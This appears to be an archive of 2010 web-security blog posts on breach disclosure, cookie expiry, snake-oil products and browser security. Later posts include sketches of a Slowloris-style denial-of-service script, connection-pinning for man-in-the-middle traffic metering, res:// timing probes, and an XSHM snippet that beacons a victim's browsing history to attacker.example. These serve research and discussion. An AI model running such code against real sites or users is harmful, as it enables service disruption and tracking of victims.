web application security lab

Odds, Disclosure, Etc…

September 14th, 2010

12 posts left…

While doing some research I happened across an old post of mine that I had totally forgotten about. It was about betting on the chances of compromise. Specifically, I was asked to give odds on whether I thought Google or ha.ckers.org would survive a penetration test (one ultimately leading to disclosure of data). Given that both Google and ha.ckers.org are under constant attack, sitting in the ecosystem is virtually the equivalent of a penetration test every day. I wasn’t counting things like little bugs disclosed in our sites; I was counting only data compromise.

There are a few interesting things about this post, looking back four years later. The first is that pretty much everything I predicted came true with regard to Google:

… their corporate intranet is strewn with varying operating systems, with outdated versions of varying browsers. Ouch. Allowing access from the intranet out to the Internet is a recipe for disaster …

So yes, this is damned near how Google was compromised. However, there’s one very important thing, if I want to be completely honest, that I didn’t understand back then. I gave 1:300 odds (against) on Google being hacked before ha.ckers.org would be. While I was right, in hindsight I’d have to change my odds. I should have given it more like 1:30. The important part that I missed was the disclosure piece. Any rational person would assume that Google has had infections before (as has any large corporation that doesn’t retain tight controls over its environment). That’s nothing new - and not what I was talking about anyway. I was talking only about publicly known disclosures of data compromise.

So the part that I didn’t speak to, and the part that is the most interesting, is that Google actually disclosed the hack. If you had gone back in time and told me that Google would get hacked and then disclose that information voluntarily, I would have called BS. Now the cynics might say that Google had no choice - that too many people already knew, and it was either tell the world or have someone out them in a messy way. But that’s irrelevant. I still wouldn’t have predicted it.

So that brings me to the point of the post (as you can hopefully see, this is not a Google-bashing post or an I-told-you-so post). I went to Data Loss DB the other day and noticed an interesting downward trend over the last two years. It could be due to a lot of things. Maybe people are losing their laptops less, or maybe hackers have decided to slow down all that hacking they were doing. No, I suspect it’s because in the dawn of social networking and collective thinking, companies fear disclosure more than ever before. They don’t want a social uprising against them when people find out their information has been copied off. Since I have no data to back that up, I have a question for all the people who are involved in disclosing or recovering from security events: what percentage of the data compromises you are aware of were disclosed to the public? You don’t have to post under your own name - I just want to get some idea of what other people are seeing.

If my intuition is correct, this points to as many breaches as ever before, or more, but less and less public scrutiny and awareness of what has happened to the public’s information. Perhaps it points to a lack of good whistle-blower laws against failing to disclose compromises (and monetary incentives for good Samaritans to report them). Or perhaps it points to a scarier reality where the bad guys already have all the compromised machines and data that they need for the moment. Either way, it’s a very interesting downward trend in the public stats that seems incongruent with what I hear when I talk to people. Is the industry really seeing fewer successful attacks than a few years ago?

Bear In Woods Or Prairie Dog Ecosystem

September 9th, 2010

13 posts left…

The post I did a few days ago apparently resonated with a lot of people, so I decided to do a quick follow-up. If a true ecosystem is not like two guys being chased by a bear in the woods, what is it like? The closest real-life analogy I can come up with is the humble prairie dog. It’s not a hero most people want to liken themselves to - more vermin than role model. But one thing is undeniable: prairie dogs are a tremendously successful species with next to no defense mechanisms. So how do they succeed when the fox is on the hunt?

Before I answer that, it’s important to know that prairie dogs aren’t exactly the friendliest beasts toward other prey animals that compete with them for food, like rabbits and ground squirrels. Those animals are not welcome in the prairie dog’s holes in times of plenty - much in the same way executives are territorial about their intellectual property. But once a real predator, like a fox or a hawk, is spotted, everything changes. Now the prairie dog will let any prey animal that can fit into its holes, regardless of the fact that they’re normally in competition. The prairie dog is strong enough to shove those smaller refuge-seekers back out and let them get eaten, thereby removing a competitor, but it doesn’t, and here’s why.

Predators need food to survive (think of the predator as a hacker who profits off of cyber crime in this analogy). If the prairie dog shoves its competitors out to be eaten, the predator has been sustained. Every time the predator eats, it gains enough strength to hunt again and possibly even produce offspring. That works completely contrary to the prairie dog’s goals. No, evolutionarily the humble prairie dog, which has the biggest hole around, has learned that it’s better to shelter your competitors and starve your attacker. Starving the predator until it moves on or dies works much better over the long haul.

The last thing the prairie dog wants is more hawks around, even if more hawks would mean less competition for food from the other prey animals. Of course, I don’t expect executives to be as smart as a rodent right off the bat. But maybe they don’t have to be - maybe evolutionary forces are at work even as we speak, and those who fail to cooperate are being eaten. Meanwhile the attacker community grows to whatever size the prey companies will support (monetarily, in intellectual property, or in whatever currency the attacker trades in). There will always be predators in the wild, but their numbers can be limited when the prey work together.

Cookie Expiration

September 8th, 2010

14 posts left…

Day 1 at the OWASP conference in Irvine. Lots of good people here, and tons of good conversations. Talking with Jeremiah from Whitehat and Sid Stamm from Mozilla reminded me that I wanted to talk about cookie expiration. I’m speaking only for myself here, not the average user, but I really dislike the concept of persistent cookies. If I wanted something to persist, I wouldn’t use sandboxes or violently and regularly clean my cookies by hand. Yet still, cookies persist way too long. Realistically there are two types of attacks that involve the persistence of cookies. The first is a drive-by opportunistic exploit: let’s say you’re on a porn site and it forces your browser to visit MySpace or Facebook, and because you’re probably logged in, boom, you’re compromised via CSRF or clickjacking or whatever. The second is where the attacker knows you’re logged in because they’re attacking you through the very platform they intend to compromise (likejacking is a good example).

Although we can’t do much about the second case, the first comes down in large part to cookie expiration. Why should a browser hold onto a cookie just because the site told it to? If I’m not actively sending requests to the site in question, there’s a good chance I don’t want my browser to keep sending cookies after X amount of time. In my case, X is probably an hour or two max (considering I take lunches). Maybe some people would argue that they don’t want to be hassled into typing their webmail password more than once per day. Okay, fine, but the point is that the magic number probably isn’t once every two weeks, or once a month, or once every 20 years, for most security people (I’d hope). So perhaps we need a default mechanism for timing cookies out when they’re not actively being sent to the server, regardless of what the server wants. Incidentally, Sid thinks this would make a good addon. Takers?
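For anyone tempted to take Sid up on that, here’s a minimal sketch of the idea, assuming a modern WebExtensions-style environment (browser.cookies and browser.webRequest). The one-hour threshold, the sweep interval, and the bookkeeping are my own placeholder choices, not a spec, and a real addon would need the cookies, webRequest, and host permissions in its manifest.

// Sketch only: expire cookies for hosts the user hasn't actively talked to recently.
const IDLE_LIMIT_MS = 60 * 60 * 1000; // one hour of inactivity (arbitrary choice)
const lastUse = {};                   // hostname -> timestamp of the last request we saw

// Record the last time the browser actually sent a request to each host.
browser.webRequest.onBeforeSendHeaders.addListener(
  details => { lastUse[new URL(details.url).hostname] = Date.now(); },
  { urls: ["<all_urls>"] }
);

// Periodically sweep: drop cookies for idle hosts, regardless of whatever
// expiration the server originally asked for.
setInterval(async () => {
  const now = Date.now();
  for (const c of await browser.cookies.getAll({})) {
    const host = c.domain.replace(/^\./, "");
    if (now - (lastUse[host] || 0) > IDLE_LIMIT_MS) {
      await browser.cookies.remove({
        url: (c.secure ? "https://" : "http://") + host + c.path,
        name: c.name,
      });
    }
  }
}, 5 * 60 * 1000); // sweep every five minutes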

The Effect of Snakeoil Security

September 4th, 2010

15 posts left…

I’ve talked about this a few times over the years during various presentations, but I wanted to document it here as well. It’s a concept that I’ve been wrestling with for 7+ years, and I don’t think I’ve made any headway in convincing anyone beyond a few head nods. Bad security isn’t just bad because it allows you to be exploited. It’s also a long-term cost center. But more interestingly, even the most worthless security tools can be proven to “work” if you look at the numbers. Here’s how.

Let’s say, hypothetically, that you have only two banks in the entire world: banka.com and bankb.com. A Snakeoil salesman goes up to banka.com and convinces them to try his product. Banka.com is seeing increased fraud (as is the whole industry), and they’re willing to try anything for a few months. Worst case, they can always get rid of it if it doesn’t do anything. So they implement Snakeoil on their site. The bad guy takes one look at the Snakeoil and shrugs. Is it worth bothering to figure out how banka.com’s security works and potentially having to modify his code? Nah, why not just focus on bankb.com, double up the fraud there, and continue doing exactly what he was doing before?

Suddenly banka.com is free of fraud. Snakeoil works, they find! They happily let the Snakeoil salesman use them as a case study. So our Snakeoil salesman goes across the street to bankb.com. Bankb.com has strangely seen a twofold increase in fraud over the last few months (all of banka.com’s fraud plus their own), and they’re desperate to do something about it. The Snakeoil salesman is happy to show them how much banka.com decreased its fraud just by buying his shoddy product. Bankb.com is desperate, so they say fine and hand over the cash.

Suddenly the bad guy is presented with a problem. He’s got to find a way around this Snakeoil software or he’ll be out of business. So he invests a few hours, finds an easy way around it, and voila - back in business. The bad guy diversifies his fraud across both banks again. Banka.com sees fraud climb back to the old levels, which can’t be correlated to anything having to do with the Snakeoil product. Bankb.com sees its fraud drop immediately after installing the Snakeoil, thereby “proving” that the product works - twice over, if you just look at the numbers.
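To make the trap concrete, here’s a toy tally (the numbers are mine, purely for illustration) showing how pure displacement makes a do-nothing product look effective in each bank’s own statistics while the global total never improves:

// Hypothetical fraud counts per phase; only the displacement pattern matters.
const phases = [
  { label: "before Snakeoil anywhere",    bankA: 100, bankB: 100 },
  { label: "banka.com installs Snakeoil", bankA: 0,   bankB: 200 }, // fraud simply moves next door
  { label: "bankb.com installs Snakeoil", bankA: 0,   bankB: 0   }, // attacker pauses to retool
  { label: "attacker bypasses Snakeoil",  bankA: 100, bankB: 100 }, // back to the old days
];
for (const p of phases) {
  console.log(`${p.label}: bankA=${p.bankA}, bankB=${p.bankB}, total=${p.bankA + p.bankB}`);
}
// Each bank's own numbers "prove" the product worked right after purchase;
// the combined total shows nothing actually improved.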

Meanwhile, what has happened? Are the users safer? No, and in fact, in some cases it may even make the users less safe (incidentally, we did finally manage to stop AcuTrust, as the company is completely gone now). Has this stopped the attacker? Only long enough to work around it. What’s the net effect? The two banks are now spending money on a product that does nothing, yet they are convinced it is saving them from huge amounts of fraud. They have the numbers to back it up - although the numbers are only half the story. Now there’s less money to spend on real security measures. Of course, if you look at it from either bank’s perspective, the product did save them, and they’ll vehemently disagree that it doesn’t work, but it also created the very problem that it solved in the case of bankb.com (double the fraud).

This goes back to the bear-in-the-woods analogy that I personally hate. The story goes that you don’t have to run faster than the bear, you just have to run faster than the guy next to you. While that’s a funny story, it only works if there are two people and you only encounter one bear. In a true ecosystem you have many, many people in the same business, and you have many attackers. If you hang your competitor(s) out to dry, that may seem good for you in the short term, but in reality you’re feeding your attacker(s). Ultimately you are allowing the attacker ecosystem to thrive by not reducing the total amount of fraud globally. Yes, this means that if you really care about fixing your own problem, you have to help your competitors. Think about the bear analogy again. If you feed the guy next to you to the bear, the bear is satiated. That’s great for a while, and you’re safe. But when the bear is hungry again, guess who he’s going after? You’re much better off working together to kill or scare off the bear.

Of course, if you’re a short-timer CSO who just wants a quick win, guess which option you’ll be going for? Jeremiah had a good insight about why better security is rarely implemented and why sweeping security changes are rare inside big companies. CSOs are typically only around for a few years. They want to go in, make a big win, and get out before anything big breaks or they get hacked. After a few years they can no longer blame their predecessor, either. They have no incentive to make things right or go for huge wins; those come with too much risk, and they don’t want their name attached to a fiasco. No, they’re better off doing little to nothing, with a few minor wins they can put on their resume. It’s a little disheartening, but you can probably tell which CSOs are which by how long they’ve stayed put and by the scale of what they’ve accomplished.

Browser Detection Autopwn, etc…

September 4th, 2010

16 posts left…

I often find myself thinking about egyp7’s DefCon speech last year. He was talking about browser autopwn, which was a relatively new concept being built into Metasploit at the time. Pretty cool technology, and with only one minor mishap he was able to demonstrate it on stage with impressive results. That’s all well and good, and you should check it out, but one thing stuck out from the presentation more than the technology itself.

By doing variable detection he could find out everything down to the individual patch level of the device in most cases. Of course a bad guy can mess with these variables and lie, which egyp7 admitted. But, wisely, he said something to the effect that if you find a browser that is lying about its user agent, you have probably found yourself a browser hacker, and you don’t want to be trying to own that browser anyway. Once you find yourself in this condition, bail. The idea mirrors a lot of the stuff I wrote about in Detecting Malice. By identifying the signature of browsers and how people navigate sites, you can learn a lot about your potential adversary - either for good or, in the case of autopwn, for evil. Growing this signature database over time could be very useful as attention on browser exploitation increases and the need for understanding user traffic and intent grows.
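As a rough illustration of the “is this browser lying about itself?” check - not Metasploit’s actual fingerprinting code; the feature tests below are just illustrative guesses - you can compare what the User-Agent claims against behavior that is harder to spoof casually:

// Guess the browser from hard(er)-to-fake globals.
function probableBrowser() {
  if (typeof window.InstallTrigger !== "undefined") return "Firefox"; // Firefox-only global
  if (typeof document.documentMode === "number")    return "IE";      // Internet Explorer
  if (typeof window.chrome === "object")            return "Chrome";  // Chrome/Chromium family
  return "unknown";
}

// What the (easily spoofed) User-Agent string claims to be.
function claimedBrowser() {
  const ua = navigator.userAgent;
  if (/Firefox\//.test(ua))       return "Firefox";
  if (/MSIE |Trident\//.test(ua)) return "IE";
  if (/Chrome\//.test(ua))        return "Chrome";
  return "unknown";
}

// If the claim and the behavior disagree, assume you've found someone who
// edits user agents for a living - and bail, as egyp7 suggested.
const lying = probableBrowser() !== "unknown" && probableBrowser() !== claimedBrowser();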

The Perils of Speeding up the Browser

September 3rd, 2010

17 posts left until the end…

A year or so ago I went to visit the Intel guys at the internal conference they throw (similar to Microsoft’s Bluehat). I honestly had no idea what to tell a bunch of hardware guys. What correlation does chip manufacturing really have with browsers or webapps? Virtualization and malware, certainly, but what else? It got me thinking… one of the things they have direct control over is how fast operating systems (and subsequently browsers) work. I talked it over with id before going out there. Faster is better, right?

I’ve got mixed feelings about fast vs. slow browsers. When something is slow, you can actually detect that something strange is going on. It’s also easier to stop it from misbehaving if an attack takes a while. When it’s fast, it’s much harder to notice that your computer had to chug for a while to do something complex, and much less likely that a user can intervene. There have been a number of exploits out there that have really been proof-of-concept only; they’re deemed impractical because they take too long or hang the browser temporarily while they’re being executed. If the speed barrier is removed, those old proofs of concept (think res:// timing attacks and so on) suddenly become much easier to perform. So while I think innovation and performance improvement are good things overall, they do come with some unintended consequences.
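The reason speed changes the calculus is that these “impractical” attacks are usually just big loops of timed probes. A minimal sketch (the probe URLs are placeholders, not a tested res:// list): the same loop that visibly hangs a slow machine can finish unnoticed on a fast one.

// Time how long the browser takes to succeed or fail at loading a resource.
function timeProbe(url) {
  return new Promise(resolve => {
    const start = Date.now();
    const img = new Image();
    img.onload = img.onerror = () => resolve(Date.now() - start);
    img.src = url;
  });
}

// Enumerate a (hypothetical) list of local resources by timing each probe.
async function enumerate(paths) {
  const results = {};
  for (const p of paths) {
    results[p] = await timeProbe(p); // thousands of these add up on slow hardware
  }
  return results;
}

enumerate(["res://some.dll/1", "res://other.exe/2"]).then(r => console.log(r));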

Browser Differences, Minutia Et Al…

September 3rd, 2010

18 posts left…

I got an email last night from someone asking me to do a breakdown of which browser is better: Internet Explorer, Firefox, Opera, Safari, or Chrome. First of all, there’s already a pretty good reference that Michal Zalewski put together. Like anything this comprehensive, since it hasn’t been edited for about half a year it’s already out of date in a few ways, but it’s a great place to get started for those who want to get familiar with the internal differences between the various browsers. No need to reinvent the wheel; go read it. Now, that’s the purely technical side, but there is one thing that’s wildly missing from most documents that talk about browser security.

Browser security often turns into a religious war amongst technologists instead of a pragmatic discussion. What are the real motives of the companies that develop the browsers? In most cases they care primarily about market share, because market share makes them money (through search engine agreements and so on). So now you have to think about yourself and your needs. What kind of user are you? I tend to be a very security-conscious person, and if you’re reading this you probably are too. I’m willing to severely degrade my usability for an increase in security, whereas most users are not. So the browser I tend towards is one that offers me the flexibility to make those decisions for myself while still giving me enough usability to do anything I need to do, when I decide to. This is why Firefox has been my personal browser of choice for years - but don’t be confused and think it’s because I believe Firefox is more secure out of the box. Firefox has just as many flaws as other browsers, by default.

While security people’s needs are important, if you look at the number of security folks compared to the rest of the world, we are insignificant as a percentage. That means it is not in the browser companies’ interest to focus on appeasing security people. Sure, it’s nice to have a browser that is secure, but that’s never going to drive the volume of users necessary to make the real revenue for their organizations - or at least that’s what the market seems to be proving. Plus, most of the major browsers above tout themselves as being more secure than their competitors, so normal consumers don’t know whom to believe. As such, while I think all the major browsers mentioned above have their pros and cons, none of them are designed with security first. They’re designed with a different set of users in mind (one that includes security people, but also our grandmas, tweens, and cousin Cletus), and that puts browser design choices somewhat at odds with security, because what does Cletus care or know about security? So that’s where plugins, addons, sandboxes, VMs, etc… come into play. It’s like wearing a condom around your browser, if you like. It gives us the ability to use the same underlying product while still protecting ourselves as much as possible.

I honestly think most browsers can be made very secure if you’re willing to sacrifice all usability - not completely secure, no doubt, but far more secure than any of the major browsers above ship by default. So it’s a little hard for me to play favorites. They each have their own security mess to clean up, so currently there is no good solution, and I don’t recommend any browser to anyone (although you people still on IE6 really should upgrade already). The work involved in really securing your browser simply isn’t worth explaining to most people. In fact, “which browser do you use” is my least favorite question, because the answer isn’t as simple as a single word. Boutique browsers, while interesting, don’t often have the support behind them to make them useful for a lot of the more common applications (lacking vast plugin support, etc…), although of anyone, they could actually align themselves nicely with the needs of security people. So, while I think browser security is often about minutiae, we need to fully grasp the market forces at work, rather than expecting dramatic security improvements, before getting completely fed up by the constant string of new functionality that only makes browsers less secure. Or we need to pick something more obscure and assume the risks that come with a product that is not tried and true. It’s not an easy problem for us or the browser companies - I don’t envy their situation.

Throttling Traffic Using CSS + Chunked Encoding

September 1st, 2010

19 posts left…

So Pyloris doesn’t work particularly well for port exhaustion on the server, but what if we could exhaust the connections on the client to better meter out traffic? That would make it easier for a MITM to see each individual request, if it worked. So I started down a rather complicated path of using a mess of link tags on an HTTP website to try to affect the connections on the HTTPS version of the same domain. No joy. It turns out that the limits placed on one port don’t affect what happens on another (at least in Firefox). So while I can exhaust all the connections to a domain over a single port, I can’t do anything to HTTPS that way - or so it seemed (unless I was willing to muddy the water further by sending a bunch of requests that I knew were a certain size to the HTTPS site, which just seemed more painful than helpful).

Then, based on some earlier research, I stormed into id’s office and started bitching that there was no point in trying to stop port exhaustion if browsers were going to allow tons of connections anyway, just spread over multiple sockets. As the words came out of my mouth I realized I had come up with the answer - a ton of webservers. I guessed that there must be some upper bound on outbound connections, probably at or below 130. You should have seen id’s face as I asked him to set up 130 connections / 6 connections per server = 22 web servers for me. Hahah… I thought he’d kill me.

It turns out it’s nowhere near 130 open connections. Firefox sets a rather arbitrary limit of 30 connections total. So if you can stand up 5 web servers, exhaust those 30 connections, and only free one up long enough to allow the victim to download one request at a time, I think we’re in business. Makes sense in theory. The problem is that it’s REALLLLY slow. I mean… painful. In my testing it seemed more like the server was broken entirely from the victim’s perspective. But eventually - and in some cases I mean minutes later - it would load. I’m sure the attack could be optimized based on the fact that no more packets are being sent once the image (or whatever) gets downloaded, which would signal the program to free up a connection. That’s as opposed to the crapola time-based approach, combined with chunked encoding to force the connections to stay open without downloading anything, that I came up with for testing. So I bet this attack could work if someone put some tender loving care into it, but it was kind of a huge waste of time for me personally - and for poor id.
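For reference, the chunked-encoding half of the trick - holding a connection open indefinitely without ever finishing the response - is easy to sketch. Here’s a minimal example, assuming Node.js purely for brevity (the original testing used several separate web servers; the port is made up). The attacking page would simply reference enough slow resources like this across the 5 holding servers to pin all 30 of the browser’s connections.

const http = require("http");

// A "holding" server: with no Content-Length and no res.end(), the response
// goes out as chunked encoding and the browser keeps the connection occupied
// waiting for the rest of the body.
http.createServer((req, res) => {
  res.writeHead(200, { "Content-Type": "text/plain" });
  res.write("x"); // one tiny chunk so the request stays "in progress" forever
  // Intentionally never end the response: this socket is now pinned as one
  // of the victim browser's ~30 global connections.
}).listen(8080);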

Incidentally, for those who have never seen or met id and would like to know a little about the other side of webappsec that I don’t talk about much here (the configuration, operating system and network), your chance is nearing. There’s a rumor that he’ll be speaking at Lascon in October. He’ll be talking about how he’s managed to secure ha.ckers.org for all these years despite how much of a target I’ve made it. :) Should be fun.

Pyloris and Metering Traffic

September 1st, 2010

20 posts left…

Pyloris is a Python version of Slowloris, and since it is written in Python, its SSL version is thread-safe. So what better way to lock up an SSL/TLS Apache install (given that Apache still hasn’t fixed their DoS)? Well, one of the big problems attackers have when trying to decipher SSL/TLS traffic is that browsers not only send a lot of requests down a single connection, but they also use a bunch of open connections over separate sockets. What if we could use Pyloris to exhaust all but one open socket?

Well, it turns out that while this sorta works, there are a lot of issues with the concept. Firstly, it requires Apache. Secondly, the server can’t be behind a load balancer (unless the load balancer is itself running Apache). Thirdly, it requires that there are no other users on the system, or there will be a seriously annoying user experience for the poor victim who can’t reach the site the man in the middle is trying to decipher traffic from. Alas… So while this didn’t work particularly well in my testing, I’m certain that with more thought someone can figure out a way to do this.
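For anyone unfamiliar with the underlying mechanics, here’s a very rough Slowloris-style sketch of what Pyloris automates - open many sockets and feed each one an HTTP request that never quite finishes, so the server’s worker pool stays tied up. It’s written in Node.js only for consistency with the other sketches here; the hostname, counts, and timings are placeholders, and the real tool does much more.

const tls = require("tls");

// Hold one TLS connection open by never completing the HTTP request headers.
function holdSocket(host, port) {
  const sock = tls.connect(port, host, { rejectUnauthorized: false }, () => {
    sock.write(`GET / HTTP/1.1\r\nHost: ${host}\r\n`); // note: no terminating blank line
    // Dribble out a bogus header every 10 seconds so the server keeps waiting
    // for the end of the request instead of timing the connection out.
    setInterval(() => sock.write(`X-a: ${Math.random()}\r\n`), 10000);
  });
  sock.on("error", () => { /* reconnect handling omitted */ });
}

// Tie up (almost) every worker; leave one free if the goal is metering
// traffic rather than outright denial of service.
for (let i = 0; i < 200; i++) holdSocket("target.example", 443);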

XSHM Mark 2

September 1st, 2010

21 posts left…

If you’re familiar with XSHM, this is going to look awfully similar (but better). When a script creates a new popup (or tab), it retains control over where to send it at a later date. I’ve talked about this concept before. But let’s see what else can be done. What if the attacker uses the history.length property to calculate how many pages the user has visited after they left the tab for wherever they landed? The attacker could do something like this:

a.location = 'data:text/html;utf-8,<script>alert(history.length);history.go(-1);<\/script>';

By setting up either a recursive setTimeout or some manual polling mechanism, the attacker can (in this case) cause a popup that reports how many pages the victim has gone through. Normally it wouldn’t cause a popup; the attacker would instead redirect to another domain they control that does the same history.length check. Voila. The user only sees a brief white flash and then the same page they were just on - as if nothing happened. They’d probably just think their browser was messing up again. This could be helpful in a number of esoteric situations where the number of pages visited may change, or where you may want to force the victim through several flows (and back and forth again), all with the single mouse click that gave you the authority to pop up in the first place. The best part is that this will follow them while they surf, for as long as both windows stay open.
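For completeness, here’s what that polling loop might look like from the attacker’s opener page, using the redirect-to-a-controlled-domain variant described above; the interval and the URLs are placeholders.

// The attacker page opens (and therefore keeps a handle to) the window.
const a = window.open("https://victim.example/landing", "_blank");

function probe() {
  // Bounce the controlled window through a page we host that reads
  // history.length, beacons it back to us, and calls history.go(-1),
  // so the victim only sees a brief white flash.
  a.location = "https://attacker.example/probe.html";
  setTimeout(probe, 15000); // recursive setTimeout, as described above
}

setTimeout(probe, 15000);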